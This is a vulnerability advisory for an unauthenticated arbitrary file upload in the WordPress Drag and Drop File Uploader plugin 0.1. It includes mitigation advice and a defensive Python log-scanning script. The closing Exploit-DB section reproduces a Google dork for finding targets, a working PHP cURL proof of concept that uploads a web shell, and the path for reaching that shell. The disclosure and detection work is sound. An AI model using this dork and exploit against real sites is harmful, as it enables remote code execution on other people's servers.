Vendor: Drag and Drop File Uploader
By: Adrien Thierry
CVSS: 9.3 (HIGH)
CWE: 434 (Arbitrary File Upload)
Product Name: Drag and Drop File Uploader
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:drag_and_drop_file_uploader:0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2012

WordPress drag and drop file upload 0.1 Arbitrary File Upload

An arbitrary file upload vulnerability exists in version 0.1 of the WordPress Drag and Drop File Uploader plugin. The plugin's upload handler, dnd-upload.php, accepts a multipart HTTP POST without validating the type of the submitted file, and the file is stored under wp-content/uploads with its original name. An attacker can therefore place a server-side script on the vulnerable server, which can lead to remote code execution.

Mitigation:

Upgrade to the latest version of the plugin or disable the plugin if it is not necessary.
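Beyond upgrading or disabling the plugin, a defender can check web-server logs for the two signals this advisory makes visible: POST requests to the plugin's dnd-upload.php handler, and requests for files under wp-content/uploads whose name carries a server-side extension (such as the double-extension name shown later on this page). The Python below is an added example, not part of the advisory or the plugin; it assumes Apache combined log format, and the log lines are constructed sample data.

```python
import re

# Constructed Apache combined-format access log lines (sample data, not from the page).
SAMPLE_LOG = """\
203.0.113.5 - - [11/Jun/2012:10:01:07 +0000] "POST /wp-content/plugins/drag-drop-file-uploader/dnd-upload.php HTTP/1.1" 200 88 "-" "curl/7.22.0"
203.0.113.5 - - [11/Jun/2012:10:01:15 +0000] "GET /wp-content/uploads/2012/06/shell.php.jpg HTTP/1.1" 200 340 "-" "curl/7.22.0"
198.51.100.7 - - [11/Jun/2012:10:05:00 +0000] "GET /wp-content/uploads/2012/06/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Jun/2012:10:05:01 +0000] "GET /wp-content/plugins/drag-drop-file-uploader/dnd-upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.9 - - [11/Jun/2012:10:09:30 +0000] "GET /wp-content/uploads/2012/06/notes.phtml HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, method, request path, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

UPLOAD_ENDPOINT = "/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php"
UPLOADS_DIR = "/wp-content/uploads/"
# A server-side extension anywhere in the basename (shell.php.jpg, x.phtml), because
# Apache AddHandler/mod_php configurations may execute double-extension names.
EXEC_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)


def parse_line(line):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_suspicious(log_text):
    """Flag POSTs to the upload handler and executable-looking files under uploads.
    A file hit from an IP that also POSTed to the handler is rated 'high'."""
    findings, posters = [], set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # drop any query string before matching
        if rec["method"] == "POST" and path == UPLOAD_ENDPOINT:
            posters.add(rec["ip"])
            findings.append({"rule": "upload_post", "ip": rec["ip"], "path": path, "severity": "medium"})
        elif path.startswith(UPLOADS_DIR) and EXEC_EXT_RE.search(path.rsplit("/", 1)[-1]):
            sev = "high" if rec["ip"] in posters else "medium"
            findings.append({"rule": "exec_ext_in_uploads", "ip": rec["ip"], "path": path,
                             "severity": sev, "status": int(rec["status"])})
    return findings
```

A 200 status on the flagged uploads request means the file was served (or executed) rather than rejected, so those hits deserve immediate review of the directory's contents.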

Exploit-DB raw data:

###########################################################
#
# Exploit Title: Wordpress drag and drop file upload 0.1 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/drag-drop-file-uploader/
# Date: 11/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage:  http://www.ali.dj/
# Software Link: http://downloads.wordpress.org/plugin/drag-drop-file-uploader.0.1.zip
# Version: 0.1
#
###########################################################

Vuln page: http://mysite.com/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php

Exploit:

<?php
// Local file to send (name chosen by the author).
$u="shell.php.jpg";
// The plugin's upload handler on a local test install.
$c = curl_init("http://127.0.0.1/wp/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php");
curl_setopt($c, CURLOPT_POST, true);
// "@file" is the legacy (pre-PHP 5.5) cURL syntax for a multipart file field; the field name is "file".
curl_setopt($c, CURLOPT_POSTFIELDS,
array('file'=>"@$u"));
// Return the server response as a string instead of printing it directly.
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>

Shell access: http://mysite.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg

#####################################################################